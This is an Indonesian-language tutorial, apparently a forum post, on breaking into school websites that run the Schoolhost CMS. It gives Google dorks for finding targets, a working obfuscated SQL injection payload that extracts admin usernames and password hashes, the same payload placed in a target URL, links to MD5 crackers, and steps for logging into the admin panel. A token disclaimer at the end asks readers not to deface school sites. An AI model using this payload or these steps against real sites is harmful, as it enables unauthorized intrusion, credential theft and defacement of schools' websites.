DEFACE POC HOST CMS
  SCHOOL HOST SQLI

Bahan

1. Dork


# inurl: "/? p = info" situs: id

# inurl: "/? p = detberita"

# inurl: "/? p = guru" situs: id 
# inurl:/?p=bukutamu 
# intext:Schoolhos Free Open Source CMS
Kembangkan , jangan manja , gunakan otak kalian !
2. Sql Exploit
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
3. MD5 hash
www.md5online.org/
https://hashkiller.co.uk/
md5 cracker.org/
www.md5hashgenerator.com/ 
Langkah Tutorial
1. Dorking di GOOGLE
cari terus , jangan malas
2. pilih target
3. masukan exploit

ex: www.target.domain/ ? p = detberita & id = 5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+--

4.kalo vuln maka akan seperti ini

disamping user ada angka angka Contoh admin30017008 hiraukan saja
5. Copy MD5 hash tadi , buka MD5 decrypter, masukan di situ , submit
6. login ke page admin nya : http://terget.domain/adminpanel
masukan user dan password 
selesai ..
mau tanam shell  ? tunggu post berikutnya
Catatan : Perlu di ingat cms ini digunakan banyak sekolah , saya mohon jangan mendeface situs situs sekolah , apalagi sampai tembas index, terus dimasukin archive
pengen tenar ? pengen di puji ? lo cari ilmu apa cari  muka ! kalo pengen tenar buat tool jangan merusak
gsk usah show off defacean , admin tidak bertanggung jawab jika ada masalah